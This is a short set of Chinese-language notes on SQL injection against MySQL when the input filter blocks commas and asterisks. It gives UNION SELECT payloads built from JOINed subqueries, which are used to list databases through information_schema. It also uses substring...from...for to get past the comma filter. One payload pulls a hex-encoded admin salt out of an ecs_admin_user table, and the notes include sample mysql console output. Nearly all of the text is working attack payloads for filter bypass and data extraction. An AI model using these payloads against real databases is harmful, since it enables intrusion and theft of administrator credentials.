select * from aaa union select * from ((select 1)a JOIN (select 2)b JOIN (select 3 )c);//其中的1,2,3用sql语句替换
注入点 :select * from aaa (sql);
因为不能逗号,所以一开始考虑如下:
select * from aaa union select * from ((select user())a JOIN (select 2)b JOIN (select 3 from user)c);
select * from aaa union select 1,2,3 from user;
暴库时:<需要用group_concat()因为不能用limit 0,1 有逗号>
select * from xxx_admin where id = -1 UNION SELECT * FROM ((SELECT group_concat(SCHEMA_NAME) from information_schema.SCHEMATA)a JOIN (SELECT 2)b JOIN (SELECT 3)c);
不能这样:<因为前面已经有了一个from,后面不能再有一个from,意味着所有的语句都只能替换其中的1,2,3>
select * from xxx_admin where id = -1 union select * from ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c) from information_schema.SCHEMATA
substring(columsn_name,1,4)过滤了逗号不能用时,可以使用:substring(column_name from 1 for 4)
解决办法:
and 1=2 union select hex(substring(ec_salt from 1 for 4)) from ecs_admin_user where user_id=1 order by attr_price desc;
同时过滤了逗号和*号,解决办法:<只要知道有哪个列就ok>
mysql> select * from ((select user())a join (select 2)b join (select 3)c );+----------------+---+---+| user() | 2 | 3 |+----------------+---+---+| root@localhost | 2 | 3 |+----------------+---+---+1 row in set (0.02 sec)
mysql> select user() from ((select user())a join (select 2)b join (select 3)c );+----------------+| user() |+----------------+| root@localhost |+----------------+1 row in set (0.01 sec)